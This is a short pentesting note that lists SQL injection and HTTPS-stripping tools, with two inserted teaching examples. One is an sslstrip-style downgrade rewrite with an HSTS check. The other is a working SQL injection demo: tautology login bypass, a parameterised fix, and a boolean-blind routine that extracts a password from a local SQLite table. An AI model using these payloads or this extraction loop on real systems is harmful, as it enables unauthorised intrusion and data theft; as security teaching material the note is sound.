Penetration Testing

Updated at 2012-05-04 06:26

This note is about penetration testing, a.k.a. pentesting: evaluating the security of a system by simulating the attacks a real adversary would carry out against it.

For the most critical security flaws at the moment, check the OWASP Top Ten. If you want to get deeper into it, read the WASC Threat Classification.

Browser-based web service: the typical flaws are SQL injection, cross-site scripting (XSS) and cross-site request forgery (CSRF).
Native client: memory-corruption bugs such as buffer overflows.

There are many pentesting guides online; it is a good idea to start from one of those, for example the OWASP Testing Guide.

Here are some pentesting tools. Use them only against your own systems, or systems you have explicit permission to test, to check whether you can break them. Use them at your own risk.

Safe3 SQL Injector: one of the easiest SQL injection tools to use. If your system breaks under this one, you should be worried. Supports MySQL, Oracle, PostgreSQL, SQL Server, Access, SQLite, Firebird and Sybase.

SQLninja: SQL injection against web applications backed by Microsoft SQL Server, geared toward getting remote access to the database server rather than just extracting data.

sslstrip: HTTPS stripping attack. Acting as a man-in-the-middle, it rewrites the https:// links and redirects it sees in plain-HTTP traffic to http://, so the victim's browser never reaches the encrypted site. It does not break SSL/TLS itself; it relies on the victim starting from a plain HTTP page.
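To make the stripping step concrete, here is an added example (not code from the page or from the sslstrip project) that performs the downgrade rewrite on a constructed HTML response and checks for the control that defeats it: the Strict-Transport-Security (HSTS) header, which tells a browser that has seen it once to refuse plain HTTP for the host. The sample page, headers and host name are made up for this example.

```python
import re

# Constructed sample response standing in for the plain-HTTP page a victim
# loads before ever following an HTTPS link. Not captured from a real site.
SAMPLE_HEADERS = {"Content-Type": "text/html"}
SAMPLE_BODY = """<html><body>
<a href="https://bank.example/login">Log in</a>
<form action="https://bank.example/transfer" method="post"></form>
<a href="http://bank.example/help">Help</a>
</body></html>"""

HTTPS_REF = re.compile(r"https://", re.IGNORECASE)


def strip_https(body):
    """What a stripping proxy does to the page it relays to the victim: every
    https:// reference becomes http://, so the browser never upgrades and the
    attacker keeps seeing plaintext. Returns (rewritten body, number of links
    downgraded)."""
    return HTTPS_REF.subn("http://", body)


def hsts_policy(headers):
    """Parse Strict-Transport-Security from a response header dict.

    Returns None when the header is absent, malformed, or carries max-age=0
    (which tells the browser to forget the host, i.e. no protection), otherwise
    a dict with the max_age and whether includeSubDomains was set. Note that
    HSTS only helps after the browser has seen the header over HTTPS once;
    the very first plain-HTTP visit is still strippable."""
    for name, value in headers.items():
        if name.lower() != "strict-transport-security":
            continue
        max_age = None
        include_subdomains = False
        for directive in value.split(";"):
            key, _, val = directive.partition("=")
            key = key.strip().lower()
            if key == "max-age":
                try:
                    max_age = int(val.strip().strip('"'))
                except ValueError:
                    return None
            elif key == "includesubdomains":
                include_subdomains = True
        if not max_age:
            return None
        return {"max_age": max_age, "include_subdomains": include_subdomains}
    return None


def audit(headers, body):
    """Summarise what an attacker on the path could do with this response."""
    _, downgraded = strip_https(body)
    return {"downgradable_links": downgraded, "hsts": hsts_policy(headers)}


if __name__ == "__main__":
    print(audit(SAMPLE_HEADERS, SAMPLE_BODY))
```

Two links in the sample are downgraded and no HSTS policy is present, which is exactly the situation sslstrip exploits; the check also treats max-age=0 as unprotected, since that value tells the browser to drop the policy.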

BSQL Hacker: framework for automating blind SQL injection. Oracle/MySQL. Automatically extracts the database.

The Mole: automatic SQL injection exploitation tool; bypasses IPS/IDS systems using generic filters. MySQL, SQL Server, PostgreSQL, Oracle.

Pangolin: SQL injection testing tool. MySQL, SQL Server, PostgreSQL, Oracle.

sqlmap: SQL injection detection and takeover tool. MySQL, PostgreSQL, SQL Server, Oracle and several other backends.

Havij: advanced SQL injection tool for a target web page. Can go on from the database to run commands on the underlying OS. MySQL, Oracle, PostgreSQL, MS Access, Sybase.

Enema: not an automated tool but a framework for professional penetration testers.

sqlsus: SQL injection and takeover tool for MySQL. Can download files from the attached web server and install and control backdoors.
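The SQL injection that the vulnerability list above names and that most of the tools above automate comes down to one mistake: user input pasted into the SQL text. The following added example (not code from the page or from any of the tools listed) builds a constructed in-memory SQLite database with made-up rows, shows the injectable login check beside its parameterised fix, and then implements the boolean-based blind extraction that the "auto extract database" features rely on: using nothing but the true/false login result, it recovers a stored password one character at a time. The table, users and passwords are assumptions for the example.

```python
import sqlite3


def build_db():
    """Constructed test database; the rows are made up for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("admin", "s3cret!"), ("alice", "wonderland")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The classic injectable check: the input becomes part of the SQL text."""
    query = ("SELECT COUNT(*) FROM users WHERE name = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone()[0] > 0


def login_fixed(conn, username, password):
    """Same check with bound parameters: the input is data, never SQL."""
    row = conn.execute("SELECT COUNT(*) FROM users WHERE name = ? AND password = ?",
                       (username, password)).fetchone()
    return row[0] > 0


def blind_extract(login, expr, max_len=32):
    """Boolean-based blind extraction. `login` is the only oracle: it answers
    True or False. Each probe asks whether character `pos` of the result of
    `expr` equals a given byte; hex() keeps quotes and other awkward
    characters out of the payload, and `--` comments out the rest of the query."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for code in range(0x20, 0x7F):  # printable ASCII
            payload = "x' OR hex(substr((%s),%d,1)) = '%02X'--" % (expr, pos, code)
            if login(payload, "irrelevant"):
                recovered += chr(code)
                break
        else:
            break  # nothing matched: end of string, or the injection does not work
    return recovered


def demo():
    conn = build_db()
    secret = "SELECT password FROM users WHERE name = 'admin'"
    tautology = "' OR '1'='1"
    return {
        # a tautology in the password field logs in without a password...
        "bypass_vulnerable": login_vulnerable(conn, "admin", tautology),
        # ...but is just a literal string once bound as a parameter
        "bypass_fixed": login_fixed(conn, "admin", tautology),
        # the admin password recovered from nothing but yes/no answers
        "extracted_vulnerable": blind_extract(lambda u, p: login_vulnerable(conn, u, p), secret),
        # against the parameterised query no probe ever matches
        "extracted_fixed": blind_extract(lambda u, p: login_fixed(conn, u, p), secret),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print("%-22s %r" % (name, value))
```

The extraction loop needs at most 95 requests per character, which is why the automated tools above can dump whole tables through a single boolean-blind injection point; the parameterised version answers False to every probe, so the loop stops after the first position with nothing recovered.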